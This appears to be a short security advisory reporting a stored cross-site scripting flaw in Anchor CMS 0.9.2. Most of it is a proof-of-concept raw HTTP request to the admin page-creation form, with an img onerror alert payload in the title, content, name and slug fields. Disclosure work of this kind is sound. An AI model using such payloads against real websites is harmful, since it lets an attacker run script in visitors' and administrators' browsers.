#Affected Vendor: http://anchorcms.com/
#Date: 23/03/2015
#Discovered by: JoeV
#Type of vulnerability: XSS
#Tested on: Windows 7
#Version: 0.9.2
#Description: Anchor CMS v 0.9.2 is susceptible to Cross Site Scripting
attack.
Proof of Concept (PoC):
---------------------------
*XSS*
---
POST /anchor/index.php/admin/pages/add HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
Content-Length: 1003
Cache-Control: max-age=0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://localhost
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/39.0.2171.95 Safari/537.36
Content-Type: multipart/form-data;
boundary=----WebKitFormBoundary4w4M5e7r1tBwc2wp
Referer: http://localhost/anchor/index.php/admin/pages/add
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: anchor-install-timezone=-330;
anchorcms-install=kIlKh79lcE6sWxZBwoSMI2eN4LuqpHgK;
anchorcms-install_payload=ZDYyYjliOTEyMzhlNjJjYmVjZTg0ZmFkNmMxMGRlMDRhOjM6e3M6NDoiX291dCI7YTowOnt9czozOiJfaW4iO2E6MDp7fXM6ODoiaHRhY2Nlc3MiO3M6Mzg4OiJPcHRpb25zIC1pbmRleGVzCgo8SWZNb2R1bGUgbW9kX3Jld3JpdGUuYz4KCVJld3JpdGVFbmdpbmUgT24KCVJld3JpdGVCYXNlIC9hbmNob3IKCgkjIEFsbG93IGFueSBmaWxlcyBvciBkaXJlY3RvcmllcyB0aGF0IGV4aXN0IHRvIGJlIGRpc3BsYXllZCBkaXJlY3RseQoJUmV3cml0ZUNvbmQgJXtSRVFVRVNUX0ZJTEVOQU1FfSAhLWYKCVJld3JpdGVDb25kICV7UkVRVUVTVF9GSUxFTkFNRX0gIS1kCgoJIyBSZXdyaXRlIGFsbCBvdGhlciBVUkxzIHRvIGluZGV4LnBocC9VUkwKCVJld3JpdGVSdWxlIF4oLiopJCBpbmRleC5waHAvJDEgW0xdCjwvSWZNb2R1bGU%2BCgo8SWZNb2R1bGUgIW1vZF9yZXdyaXRlLmM%2BCglFcnJvckRvY3VtZW50IDQwNCBpbmRleC5waHAKPC9JZk1vZHVsZT4KIjt9;
anchorcms=u8h0s9Vjh9LUAM56y7TDWBFolw8tJxxC
------WebKitFormBoundary4w4M5e7r1tBwc2wp
Content-Disposition: form-data; name="token"
286db1269c0e304c7e435bf10251f950
------WebKitFormBoundary4w4M5e7r1tBwc2wp
Content-Disposition: form-data; name="title"
<img src="blah.jpg" onerror="alert('XSS')"/>
------WebKitFormBoundary4w4M5e7r1tBwc2wp
Content-Disposition: form-data; name="redirect"
------WebKitFormBoundary4w4M5e7r1tBwc2wp
Content-Disposition: form-data; name="content"
<img src="blah.jpg" onerror="alert('XSS')"/>
------WebKitFormBoundary4w4M5e7r1tBwc2wp
Content-Disposition: form-data; name="name"
<img src="blah.jpg" onerror="alert('XSS')"/>
------WebKitFormBoundary4w4M5e7r1tBwc2wp
Content-Disposition: form-data; name="slug"
<img src="blah.jpg" onerror="alert('XSS')"/>
------WebKitFormBoundary4w4M5e7r1tBwc2wp
Content-Disposition: form-data; name="status"
published
------WebKitFormBoundary4w4M5e7r1tBwc2wp
Content-Disposition: form-data; name="parent"
1
------WebKitFormBoundary4w4M5e7r1tBwc2wp--
--
Regards,
*Joel V*